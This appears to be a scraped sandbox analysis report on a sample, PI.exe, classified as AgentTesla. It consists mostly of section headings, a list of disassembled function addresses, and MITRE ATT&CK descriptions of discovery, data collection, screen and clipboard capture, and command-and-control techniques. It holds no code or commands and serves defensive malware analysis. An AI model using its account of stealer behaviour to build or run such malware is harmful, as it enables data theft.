Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PI.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 00454858, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392
COMMON

Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Function 00440F64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Function 004547D0, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Function 0045433C, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130
windowregistryCOMMON

Function 00440D14, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Function 00454034, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 125
windowCOMMON

Function 00452F50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
COMMON

Function 0045372C, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Function 00401AA0, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Function 0042727C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Function 004015B8, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 004755CC, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 0040731A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Function 0040731C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 0040174C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 0041D1FC, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Function 00440918, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Function 00405AE8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Function 00471BA8, Relevance: 18.4, APIs: 7, Strings: 3, Instructions: 909
COMMONCrypto

Function 0045194C, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Function 0046BD44, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 727
COMMONCrypto

Function 0043C504, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Function 004493A0, Relevance: 10.9, APIs: 7, Instructions: 405
nativeCOMMONCrypto

Function 0044EEA4, Relevance: 9.3, APIs: 6, Instructions: 284
windowCOMMONCrypto

Function 00454FFC, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre